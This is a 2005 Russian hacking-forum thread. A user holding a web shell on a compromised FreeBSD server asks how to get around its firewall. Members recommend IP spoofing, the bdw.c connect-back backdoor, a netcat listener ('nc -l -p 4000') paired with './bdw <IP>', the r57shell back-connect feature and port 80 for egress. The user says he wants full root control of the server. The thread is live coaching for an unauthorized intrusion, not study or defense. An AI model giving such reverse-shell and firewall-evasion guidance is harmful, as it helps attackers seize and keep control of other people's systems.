Обойти фаерволл в FreeBSD

Discussion in 'Безопасность и Анонимность' started by scorpion, 23 Dec 2005.

  1. scorpion

    scorpion Banned

    Joined:
    6 Dec 2005
    Messages:
    18
    Likes Received:
    0
    Reputations:
    0
    Короче висит операционка FreeBSD.У мя есть веб шелл с правами nobody.На системе мне можно применять команду perl.Я когда запускаю какой-нить бинд шелл,то этот порт открывается(видно при команде show opened ports).Но подключиться к этому порту не могу.Интуиция подсказывает на 100%,что там сидит фаерволл.С помощью какого бинд шелла мне его обойти???И где достать этот шелл?
     
  2. fucker"ok

    fucker"ok Elder - Старейшина

    Joined:
    21 Nov 2004
    Messages:
    580
    Likes Received:
    279
    Reputations:
    91
    Это во многом зависит от настройки фаервола. Думаю нужно рулить в сторону спуфинга (обычно для локалхоста или локалки разришают больше, чем для интернета), но если в правилах обазначенны устройства (via lo0, via tun0 и тд и тп), то ничего из спуфинга не выйдет.
    Подделка ip не даст тебе коннекта на тот комп (вывод не будет возаращатся тебе), но, возможно, ты сможешь выполнять команды (слепо).
    :]
     
    1 person likes this.
  3. virgoz

    virgoz Elder - Старейшина

    Joined:
    16 Sep 2004
    Messages:
    151
    Likes Received:
    28
    Reputations:
    15
    scorpion, юзай Connect-Back Backdoor.
    bdw.c
    Есть еще пару способов, но этот самый простой...
     
    2 people like this.
  4. fucker"ok

    fucker"ok Elder - Старейшина

    Joined:
    21 Nov 2004
    Messages:
    580
    Likes Received:
    279
    Reputations:
    91
    Что-то я стормозил... Дейсвительно, так проще. :]
     
  5. scorpion

    scorpion Banned

    Joined:
    6 Dec 2005
    Messages:
    18
    Likes Received:
    0
    Reputations:
    0
    Спасибо вам fucker"ok и virgoz
    Обоим по +1 репутации :))))
     
  6. scorpion

    scorpion Banned

    Joined:
    6 Dec 2005
    Messages:
    18
    Likes Received:
    0
    Reputations:
    0
    VIRGOZ

    Слушь как я понял:Мне надо на своём винте запустить nc -l -p 4000 .А на взломаном сервере мне надо будет сделать ./bdw <мой IP> .Прав я???
     
  7. virgoz

    virgoz Elder - Старейшина

    Joined:
    16 Sep 2004
    Messages:
    151
    Likes Received:
    28
    Reputations:
    15
    scorpion, можно и так. Но для безопасности, я бы запускал netcat на серваке.
     
  8. SladerNon

    SladerNon Адам

    Joined:
    6 Mar 2005
    Messages:
    1,636
    Likes Received:
    941
    Reputations:
    355
    Добавить можно то, что если back-connect делать на жестко зафорваленной машине, имеет смысл на общедоступных портах...
    Топишь как правило 80 порт тут прокатит..
     
    1 person likes this.
  9. scorpion

    scorpion Banned

    Joined:
    6 Dec 2005
    Messages:
    18
    Likes Received:
    0
    Reputations:
    0
    Слушайте есть ли такой back connect на перл языке.Просто дело в том,что у меня нет прав ./file А запускать перл файл без проблем.Так что мне нужно,чтоб я на своей системе запустил бы nc -l -p 666 ,а на сервере запустил бы перл шелл,который бы подключился бы на мою тачку и так бы я обошёл firewall.Кто-нить можете помочь???

    Где взять такой перл шелл???

    P.S За хорошую помощь поднимаю репутацию всегда...
     
  10. fucker"ok

    fucker"ok Elder - Старейшина

    Joined:
    21 Nov 2004
    Messages:
    580
    Likes Received:
    279
    Reputations:
    91
  11. scorpion

    scorpion Banned

    Joined:
    6 Dec 2005
    Messages:
    18
    Likes Received:
    0
    Reputations:
    0
    Слушайте,когда я загрузил r57shell.php на сервер,то я увидел внизу опцию back-connect.Я должен у ся на системе пустить nc -l -p 4000,а там в back-connect написать мой IP и порт 4000.Да???
     
  12. scorpion

    scorpion Banned

    Joined:
    6 Dec 2005
    Messages:
    18
    Likes Received:
    0
    Reputations:
    0
    Слушь короче запускаю я у себя nc -l -p 4000.Потом там в этом шелле в backconnect'е я завожу мой ip address(у меня стоит роутер и нас четверо.Адрес роутера 85.195.59.x,а мой локальный адрес 192.168.1.x .Который надо туда вписать?)Я пробовал оба вписывать,выходило сообщение Now script try to connect ip : port. Но в netcat ничего не появляется.Может быть такое что роутер не даёт войти?Так как у меня один раз такое было с RAdmin'ом.Короче я у себя запустил,а с друга компа не мог войти.Что мне надо будет сделать???И чего это вина???
     
  13. tclover

    tclover nobody

    Joined:
    13 Dec 2005
    Messages:
    741
    Likes Received:
    682
    Reputations:
    287
    Да... Не лучше ли один раз описать свою проблему более детально?
    То одно - то другое...
     
  14. scorpion

    scorpion Banned

    Joined:
    6 Dec 2005
    Messages:
    18
    Likes Received:
    0
    Reputations:
    0
    Я в последнем посте хорошо описал свою проблему.Кто знает,тот поймёт.Так что кто знает пусть подскажет как это исправить???
     
  15. kot777

    kot777 O-la-la!

    Joined:
    13 Aug 2004
    Messages:
    588
    Likes Received:
    435
    Reputations:
    454
    Возможно фаерволл забивает и бэк-коннекты тоже. Такое у меня бывало, попробуй ещё скрипты perl бэк-коннектов. Если не поможет, забей, серваков и инете море.
     
  16. scorpion

    scorpion Banned

    Joined:
    6 Dec 2005
    Messages:
    18
    Likes Received:
    0
    Reputations:
    0
    Короче взлом серьёзный.Я не хочу просто ломать сайты подрят,а мне нужен этот сервак.У меня есть пароль рута.Мне нужен только bindshell.Что мне делать???Скорее всего я думаю,что роутер не даёт на мой порт сесть.Так что мне прийдёться проверять на другом компе....

    Большое спасибо всем!!!

    Просьба не закрывать эту тему.Если есть тдеи,то говорите...
     
  17. m0nzt3r

    m0nzt3r моня

    Joined:
    22 Jun 2004
    Messages:
    2,096
    Likes Received:
    673
    Reputations:
    591
    а ты после бек коннекта смотрел там на полосе в рст шелле пишется иногда ошибка...но раз говоришь не было ошибки но коннекта тоже значит фаер 90%...
    если есть пасс рута то по ssh не можешь коннектиться?а бинд шелл не надо лучше бекдор
     
  18. scorpion

    scorpion Banned

    Joined:
    6 Dec 2005
    Messages:
    18
    Likes Received:
    0
    Reputations:
    0
    Слушь короче не могу я конектиться по ssh.Так как в конфиге только локалхост может конектиться.Что мне делать.Где достать этот бэкдор,или как сделать бинд,самое главное что мне нужно,чтоб я смог стать бы рутом...
     
  19. scorpion

    scorpion Banned

    Joined:
    6 Dec 2005
    Messages:
    18
    Likes Received:
    0
    Reputations:
    0
    НУ ЧТО КТО-НИТЬ ПОДСКАЖЕТ???